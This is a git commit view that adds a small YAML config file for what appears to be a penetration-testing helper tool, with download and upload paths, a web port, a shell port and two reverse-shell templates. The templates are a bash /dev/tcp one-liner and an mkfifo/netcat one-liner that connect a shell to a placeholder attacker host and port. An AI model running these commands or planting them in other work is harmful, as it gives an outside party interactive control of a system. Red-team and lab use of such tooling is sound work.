Added .up.yml config

This commit is contained in:
Random936 2024-12-24 18:15:22 -08:00
parent 4f72574872
commit 1e6d04402a

8
.up.yml Normal file
View File

@ -0,0 +1,8 @@
download_path: ~/up_downloads
upload_path: ~/up_uploads
web_port: 8000
shell_port: 9001
shells:
bash: "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"
mkfifo: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f"